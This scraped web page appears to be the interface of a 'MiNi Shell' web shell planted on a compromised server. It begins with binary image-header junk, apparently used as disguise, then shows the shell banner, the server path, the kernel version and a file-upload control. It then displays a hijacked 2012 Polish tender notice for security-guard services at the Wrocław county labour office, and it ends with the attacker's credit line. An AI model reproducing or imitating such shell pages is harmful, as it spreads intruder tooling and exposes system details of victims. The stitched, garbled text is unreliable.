JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120821/180373-N-2012.html

<p class="kh_header"><b>Wrocław: Usługa ochrony mienia Powiatowego Urzędu Pracy we Wrocławiu</b><br>
<b>Numer ogłoszenia: 180373 - 2012; data zamieszczenia: 21.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.wroclaw.ibip.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony mienia Powiatowego Urzędu Pracy we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest całodobowa ochrona Powiatowego Urzędu Pracy we Wrocławiu w każdym dniu obowiązywania umowy tj. w okresie: od dnia 31 października 2012 r. od godz. 15:00 do dnia 30 czerwca 2015r. do godziny 15.00.
2. Lokalizacja: nieruchomość ogrodzona, zabudowana dwoma oddzielnymi budynkami biurowymi ( budynek A i budynek B), położona we Wrocławiu przy ul. Glinianej 20-22.       
3. W obydwu budynkach występuje duże natężenie ruchu klientów (średnio ok. 1000 osób dziennie). 
4. W obiektach zainstalowane są systemy monitoringu oraz sygnalizacji napadu i włamania. 
5. Szczegółowe warunki realizacji zamówienia określa załączony do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) - Wzór umowy (ZAŁĄCZNIK NR 8 DO SIWZ).

W ramach usługi do obowiązków Wykonawcy należy, w szczególności:
1. Ochrona obiektów przed rabunkiem, zagrożeniem wybuchem, pożarem, napadem, włamaniem, dewastacją.
2. Powiadamianie odpowiednich służb o zagrożeniach.
3. Niedopuszczanie do wnoszenia materiałów niebezpiecznych oraz materiałów i towarów przeznaczonych do sprzedaży i rozpowszechniania.
4. Pilnowanie i ochrona mienia znajdującego się w obiektach Zamawiającego przed dewastacją, uszkodzeniem bądź kradzieżą.
5. Obsługa istniejących systemów: alarmowych napadu i włamania, telewizji przemysłowej, instalacji ochrony i wykrywania pożaru.
6. Sprawowanie kontroli nad legalnością wynoszenia z budynków sprzętu elektronicznego, komputerowego i innych przedmiotów wyposażenia. 
7. Podejmowanie działań interwencyjnych w przypadku stwierdzenia zakłóceń porządku na terenie chronionych obiektów.
8. Egzekwowanie przestrzegania zakazu palenia tytoniu na terenie Urzędu i wprowadzania zwierząt.
9. Dokonywanie obchodu budynku co najmniej raz na 2 godziny w czasie wolnym od pracy Zamawiającego i sprawdzanie, czy zamknięte są wszystkie drzwi do pomieszczeń biurowych i sal obsługi oraz czy zakręcone są krany i zawory.
10. Zapalanie i gaszenie świateł nocnych zewnętrznych i wewnątrz obiektu. 
11. Sprawdzanie stanu zamknięcia drzwi i okien.
12. Przyjmowanie i wydawanie pracownikom, za pisemnym potwierdzeniem, kluczy                       do pokojów i pomieszczeń służbowych.
13. Udostępnianie pracownikom pomieszczeń służbowych w dni wolne od pracy oraz                          po godzinach pracy na zasadach ustalonych przez Zamawiającego.  
14. Prawidłowe reagowanie na sytuacje nagłe, awaryjne, związane z istniejącymi w obiektach instalacjami.
15. Podejmowanie działań zabezpieczających oraz powiadamianie wskazanego pracownika Zamawiającego i właściwych służb w przypadku stwierdzonych awarii, włamania, kradzieży, pożaru itp..
16. Bieżące prowadzenie książki służby, w której odnotowuje się przebieg służby, oraz dokumentacji z tym związanej. Książka służby jest udostępniana  Zamawiającemu bez ograniczeń.
17. W razie stwierdzenia pożaru, awarii sieci ciepłowniczej, elektrycznej, wodociągu, kanalizacji lub innych instalacji pracownicy ochrony są zobowiązani do bezzwłocznego powiadomienia:
- straży pożarnej w przypadku pożaru,
- pogotowia energetycznego, wodociągowego itp. w przypadkach awarii sieci,
         - upoważnionego pracownika Zamawiającego.
18. W przypadku zakłócenia porządku na terenie posesji lub w budynku pracownicy Wykonawcy są zobowiązani do wezwania policji bądź straży miejskiej.
19. W razie potrzeby przyjazdu grupy interwencyjnej Wykonawca zapewni dotarcie takiej grupy do danego obiektu w jak najkrótszym czasie, nie dłuższym niż 30 minut.
20. W okresie zimowym wyjątkowo - w razie dużych nocnych opadów śniegu - przed przybyciem służb porządkowych pracownicy ochrony powinni odgarnąć śnieg na przejściu od furtki do wejść do budynków A i B (sprzęt zapewnia Zamawiający).
21. Kontrola ruchu osobowego wewnątrz budynków po zamknięciu drzwi wejściowych - według zasad ustalonych przez Zamawiającego.
22. Sprawdzanie czy w obrębie obiektów po godzinach pracy Urzędu nie przebywają osoby do tego nieupoważnione.

 Oprócz obowiązków wspólnych dla obydwu budynków Wykonawca zapewni:
 a)  w budynku A 
1. dyżury całodobowo - 1 pracownik ochrony, którego zadaniem w czasie pracy Zamawiającego jest śledzenie monitorów telewizji przemysłowej; 
2. dyżury pracowników ochrony w dni pracy Zamawiającego w godzinach od 7.00 do 16.00 - 1 pracownik ochrony, który w czasie godzin pracy Zamawiającego co godzinę ma patrolować budynek (w szczególności kondygnacje o największym nasileniu ruchu interesantów) oraz reagować na wezwania pracowników Zamawiającego i udzielać (na prośby klientów) informacji o lokalizacji komórek organizacyjnych Zamawiającego;
3. zamykanie wszystkich drzwi wejściowych do obiektu od strony parkingu oraz bramy                          i furtki przy bramie o ustalonej godzinie i zabezpieczenie kluczy na portierni oraz otwieranie w dniu następnym;
4. otwieranie i zamykanie drzwi wejściowych i furtki od strony NFZ o ustalonej godzinie;
5. kontrola ruchu pojazdów - zapewnienie możliwości wjazdu i wyjazdu uprawnionych samochodów na teren parkingu;

 b) w budynku B 
1. dyżury całodobowo - 1 pracownik ochrony;
2. zamykanie wszystkich drzwi wejściowych do obiektu i zabezpieczenie kluczy na portierni oraz otwieranie w dniu następnym o ustalonych godzinach;
3. pracownik ochrony w czasie godzin pracy Zamawiającego ma patrolować budynek, głównie zaś powinien przebywać na parterze gdzie występuje największe nasilenie ruchu interesantów i reagować na wezwania pracowników Zamawiającego oraz, w miarę potrzeby, udzielać informacji o lokalizacji komórek organizacyjnych.

Zamawiający wymaga, aby:
1. pracownicy ochrony dbali o schludny wygląd - umundurowanie powinno być czyste, kompletne zaś identyfikator indywidualny umieszczony i noszony w widocznym miejscu;
2. pracownicy ochrony byli komunikatywni, asertywni, o wysokiej kulturze osobistej;
3. pracownicy ochrony nie oddalali się z miejsca służby bez zgody osób upoważnionych                      ze strony Zamawiającego;
4. nie przyjmowali wizyt osób postronnych;
5. nie przebywali na obiektach chronionych poza wyznaczonymi  godzinami pracy;
6. przestrzegali przepisów ustawy z dnia 26 października 1982 r. o wychowaniu                         w trzeźwości i przeciwdziałaniu alkoholizmowi 
7. nie korzystali z  telefonów służbowych w celach prywatnych.

Wyżej wymienione obowiązki Wykonawcy dookreślone zostaną w szczegółowej instrukcji przekazanej w dacie podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 32.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ma posiadać ważną koncesję na wykonywanie działalności                       w zakresie usług ochrony osób i mienia wydaną przez właściwego ministra (zasady wykonywania działalności gospodarczej w zakresie usług ochrony osób         i mienia oraz kontroli tej działalności określa ustawa z dnia 22 sierpnia 1997r.                  o ochronie osób i mienia opublikowana (tekst jedn. Dz. U. z 2005r. Nr 145, poz. 1221,                  z późn. zm. oraz akty wykonawcze wydane na jej podstawie))</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca należycie wykonał (bądź wykonuje) usługę ochrony mienia co najmniej 1 obiektu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ma posiadać samochodową grupę interwencyjną, której zadaniem będzie,                      w przypadku zgłoszenia zagrożenia lub potrzeby wsparcia dotarcie do wskazanego obiektu w czasie nie dłuższym niż 30 minut od momentu otrzymania informacji, wyposażoną w sprzęt łączności bezprzewodowej oraz zapewnienie pracownikom ochrony łączność bezprzewodową oraz zastępcze źródło oświetlenia (np. latarki)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca na czas realizacji zamówienia będzie dysponował co najmniej 9 osobami zdolnymi do wykonania zamówienia, z których: każda jest osobą nie karaną za przestępstwo umyślne, każda posiada co najmniej 3 - letnie doświadczenie w ochronie osób                         i mienia, 1 osoba - kierownik ochrony obiektu, posiada licencję I lub II stopnia oraz wykształcenie co najmniej średnie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ma posiadać aktualne na dzień składania ofert ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 2 000 000,00 zł (słownie: dwa miliony złotych, 00/100) lub równowartość tej kwoty, o ile polisa jest opłacona w innej walucie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie o dysponowaniu grupą interwencyjną</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny dokument potwierdzający, że Wykonawca zapewnia wysoką jakość świadczonych usług z zakresu ochrony mienia (np. Certyfikat ISO 9001, Certyfikat AQAP 2120, Certyfikat Jakości Usług Ochrony itp.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Jakość usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.wroclaw.ibip.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22 (pokój nr 508), 50-525 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22 (pokój nr 04 - sekretariat), 50-525 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com